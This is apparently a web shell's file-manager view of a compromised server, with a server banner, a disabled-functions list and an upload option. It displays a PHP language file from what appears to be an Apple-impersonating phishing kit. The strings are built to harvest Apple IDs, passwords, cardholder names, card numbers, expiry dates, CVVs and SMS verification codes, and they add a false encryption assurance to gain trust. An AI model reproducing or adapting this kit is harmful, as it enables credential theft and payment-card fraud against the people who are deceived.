HEX
Server: LiteSpeed
System: Linux venus 5.15.0-160-generic #170-Ubuntu SMP Wed Oct 1 10:06:56 UTC 2025 x86_64
User: axxoncom (1007)
PHP: 8.3.19
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Upload Files
File: /home/axxoncom/public_html/Apple/langs/lang/en.php
<?php
$lang = array(
    "_login_title" => "Sign in.",
    "_login_subtitle" => "Sign in to your Apple account",
    "_apple_id_placeholder" => "Apple ID",
    "_password_placeholder" => "Password",
    "_remember_me" => "Remember me",
    "_forgot_apple_id" => "Forgot Apple ID or password?",
    "_create_apple_id" => "Don’t have an Apple ID? Create yours now.",
    "_need_help" => "Need some help? Chat now or call 1-800-MY-APPLE.",
    "_encryption_notice" => "The Apple Online Store uses industry-standard encryption to protect the confidentiality of the information you submit. Learn more about our Security Policy.",
    "_more_ways_to_shop" => "More ways to shop: Find an Apple Store or other retailer near you. Or call 1-800-MY-APPLE.",
    "_copyright" => "Copyright © 2024 Apple Inc. All rights reserved.",
    "_payment_info_title" => "Payment Information.",
    "_add_card_subtitle" => "Add credit or debit card.",
    "_full_name_placeholder" => "Full name",
    "_card_number_placeholder" => "XXXX XXXX XXXX XXXX",
    "_exp_date_placeholder" => "MM/YY",
    "_cvv_placeholder" => "CVV",
    "_continue_button" => "Continue",
    "_confirmation_title" => "Confirmation.",
    "_confirmation_subtitle" => "Enter confirmation code we sent to your number.",
    "_sms_code_placeholder" => "SMS CODE",
    "_incorrect_code" => "Incorrect code",
    "_request_new_code" => "Request new code.",
    "_new_code_sent" => "We have sent a new code."
);
?>